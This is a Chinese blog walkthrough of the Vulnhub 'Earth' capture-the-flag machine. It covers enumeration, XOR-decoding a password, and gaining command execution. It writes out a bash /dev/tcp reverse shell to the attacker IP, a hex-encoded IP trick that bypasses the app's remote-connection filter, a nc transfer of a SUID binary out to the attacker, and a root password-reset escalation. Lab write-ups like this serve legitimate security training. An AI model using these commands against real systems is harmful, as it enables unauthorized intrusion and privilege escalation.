2-vulnhub靶场,Earth

最新推荐文章于 2023-11-23 19:21:38 发布
最新推荐文章于 2023-11-23 19:21:38 发布
阅读量1.6k 收藏 3
点赞数 1
分类专栏: 靶机-每日练习记录 文章标签: 网络 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49078152/article/details/126330611
版权

Vulnhub earth靶机
攻击机192.168.137.129
靶机192.168.137.128
在这里插入图片描述
开放22,80,443端口
发现443端口显示这个ip绑定了俩个域名
查看80端口
在这里插入图片描述
查看443端口
在这里插入图片描述
修改host文件
linux目录:/etc/hosts
后面添加192.168.137.128 earth.local terratest.earth.local
访问https://earth.local
https://terratest.earth.local (无)
http://earth.local
http://terratest.earth.local
页面都是下面这个
在这里插入图片描述
利用kal对该域名进行目录扫描
dirb https://earth.local
在这里插入图片描述
第一个地址显示有内容,第二个地址返回403
在这里插入图片描述
扫描第二个域名的目录:
在这里插入图片描述
查看robots.txt文件
在这里插入图片描述
最后面有个文件名,尝试后缀为txt:
在这里插入图片描述
在这里插入图片描述
这里可以知道域名上那些加密字段是通过密钥‘testdata.txt’xor运算得到的.
发现账户名terra.
先把这个txt文件下载下来:

wget https://terratest.earth.local/testdata.txt --no-check-certificate

在这里插入图片描述
写个小程序

import binascii
testdata = binascii.b2a_hex(open('testdata.txt','rb').read()).decode()
data = input()
print(hex(int(data,16) ^ int(testdata,16)))

运行然后将要解密的数据输入即可,解密数据如下:

0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973436679202f2f7d6f6d6f3b2f70706561726527327e643b7f662427782c7f6a6a3d2a616c66332c6f717c79247736267c25516a76772b55203c40663b792f6a7f6b72307e683c506a31732e3d066997f3dc732d712c3c6a247b75676e247536267f2a2b6f2765726c6a7c6d6e6e2f3f3b2d277f31252c667b6b78382e607f6229228ce5996e70607573742a797a64317d7862693a6f7b297e73687d2c5e3623546a637937616a2c796e3e4868752d17736b6c2924496e2a27792f6479626a377074347e7522743d356a6768262379782a2b6677693d2f65617079726e63616e786b797f382f6b3c0b363d2b3180e8da712a497238786f22507c377766626e
0x4163636f7264696e6720746f20726164696f6d657472696320646174696e6720657374696d6174696f6e20616e64206f746865722065766964656e63652c20456172746820666f726d6564206f76657220342e352062696c6c696f6e2079656172732061676f2e2057697468696e207468652066697273742062696c6c696f6e207965617273206f66204561727468277320686973746f72792c206c69666520617070656172656420696e20746865206f6365616e7320616e6420626567616e20746f2061666665637420456172746827732061746d6f73706865726520616e6420737572666163652c206c656164696e6720746f207468652070726f6c5e72726c6a7e3c6576797f7b262a786b7c68246b61772d6f6320302d2777656231343669716324687465376166236065637e296f3e6b466e6b756b7a64747c613e797e63697976627e6a6e24364f3f30697e7f647c30767c246c78347e25356c33642a606d783661387b76636b65746469612025652c7b747239783e717b3177246826767e6f6178782d296966347476367075646b
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

3段密文,貌似就之后最后一个解密的数据是有用的,其余都是乱码
看看第3段密文解析;
在这里插入图片描述
可以发现是earthclimatechangebad4humans的循环
尝试账号terra,密码earthclimatechangebad4humans进行登录:
显示登录成功:
在这里插入图片描述
发现是一个命令执行权限
在这里插入图片描述
尝试反弹shell

Kali攻击机执行
nc -lvp 23333
命令执行
bash -i >& /dev/tcp/192.168.137.129/23333 0>&1

在这里插入图片描述
显示拒绝连接
任意方法在文件中查看一下,最终在secure_message/forms.py中发现:(可以下载整套源码放入到代码审计系统中搜寻‘Remote connections are forbidden’)

for potential_ip in re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', value): 
	try: 
		ip_address(potential_ip) 
	except: 
		pass 
else: 
	raise ValidationError('Remote connections are forbidden.')

这个代码就是对ip的字母进行了过滤,所以可以将ip数字转换为16进制进行绕过:
指令如下:

bash -i >& /dev/tcp/0xc0.0xa8.0x89.0x81/23333 0>&1

成功:
在这里插入图片描述
提权:

find / -perm -u=s -type f 2>/dev/null
-perm 按权限查找 ugo(用户/组/其他) rwx(读/写/执行) 
S 为SUID/SGID特殊权限
-type 文件类型f->文件  d->文件夹
2>/dev/null 不显示错误信息 2->错误输出(0->标准输入; 1->标准输出) >(先清除再写入) or >>(追加) /dev/null位桶(黑洞),接受到的任何数据都会被丢弃

在这里插入图片描述
在这里插入图片描述
显示没有相应的触发器,
只好将其传到kali
攻击机:nc -nlvp 1234 >reset_root
靶机shell:nc 192.168.137.129 1234 < /usr/bin/reset_root
在这里插入图片描述
给予用户权限
在这里插入图片描述
下面利用strace进行解析

strace /home/kali/reset_root

在这里插入图片描述
可以看到,程序执行到这个三个目录就停止了
在shell查看一下有没有这个目录
发现没有,就将这三都创建看看
在这里插入图片描述
或者命令:

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

shell中执行reset_root文件
显示将密码重置为Earth
在这里插入图片描述
Su切换账号,密码是Earth
在这里插入图片描述
提权成功

液冷
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
WEB渗透学习-upload-labs靶场
04-20
upload-labs为WEB渗透中文件上传漏洞专项练习靶场,内涵各种文件上传漏洞类型,采用关卡制,一共21关,由易到难,适合刚接触该漏洞的新手巩固练习
看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets: Earth
Aluxian_的博客
07-08 1024
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。
VulnHub-Earth打靶记录
qq_43534481的博客
04-19 2334
VulnHub-Earth 打靶记录 详细解题思路
[渗透测试学习靶机01] vulnhub靶场 The Planets: Earth
weixin_47112073的博客
10-10 2744
渗透测试学习,vulnhub靶场练习Earth靶机
VulnHub靶场----Earth
qq_61670993的博客
10-18 486
Vulnhub靶场初体验
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3060
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
实验室信息管理 实验室信息管理系统 v2.0
11-12
实验室信息管理系统(Lims)是一套集实验室试剂、耗材、设备于一体的在线共享的管理系统,主要应用于质检部门、高校、科研院所、公司研发中心、制药公司等机构,也可以运用于其
Vulnhub靶场】NOOB: 1
DG_s1mple
03-19 2957
环境准备 下载靶机导入到vmware 攻击机IP地址:192.168.2.16 靶机ip地址:192.168.2.15 信息收集 ftp服务 我们使用nmap扫描一下靶机,看看它开放的服务信息 开放了ftp,http跟ssh这三个服务,我们首先用匿名用户访问一下靶机的ftp 有两个文件,我们下载下来分别查看一下 第一个是base64编码过的,我们把它解码可以得到一串账号密码 第二个文件就没有什么有用的信息了 web服务 我们访问一下他的网站,是一个可登录的页面 除此之外,并没有什么发现 渗透开
vulnhub 靶机 Earth
qq_44029310的博客
06-12 1220
一次打靶记录。
渗透测试-vulnhub靶机 Earth
最新发布
2301_79441074的博客
11-23 104
dns解析 ,xor解码,
Earth靶机实验实战演练
lianliandad的博客
11-01 925
好好学习
Vulnhub 系列 -- Earth
ch3cke的博客
03-21 3812
前期信息收集 nmap主机发现,主要探测存活主机的IP和以及主机开放的端口信息: ┌──(kali㉿kali)-[~] └─$ nmap -sP 192.168.139.135/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 04:19 EDT Nmap scan report for 192.168.139.2 Host is up (0.0017s latency). Nmap scan report for 192.168.139.13
vulhub上oscp InfoSec靶机渗透测试writeup
qq_44635376的博客
02-05 635
这里写目录标题信息搜集nmap搜集靶机信息访问80端口网站,探索网站信息阅读网页内容搜集到一个有效信息(这台主机的用户名是oscp)发现80端口下有/secret.txt文件,我们直接去访问看看,发现一串字符,这时候猜测应该是加密的什么重要内容,很兴奋。接下来我们要解密。这串加密像是base64加密,于是我在将密文下载到kali虚拟机中使用secret.txt命名。然后使用命令base64 -d secret.txt > private_key解密并将内容保存到private_key文件中,解密以后的
Vunlhub_Eearth
qq_45434762的博客
12-26 2360
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
Vulnhub靶机实战-NARAK
黑白的博客
01-18 963
声明 好好学习,天天向上 搭建 用vmware打开,都调成NAT或者都调成桥接 渗透 存活扫描,发现目标 arp-scan -l 端口扫描 nmap -T4 -A 192.168.31.52 -p 1-65535 -oN nmap.A 开启端口 发现开启80,22 访问80 http://192.168.31.52 看了首页,看见了地狱一样,不禁让我想起了最近的电视剧《风声》里面的地狱变 扫目录吧 python3 dirsearch.py -u 192.168.31.52 开的目录不是很多 使用
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值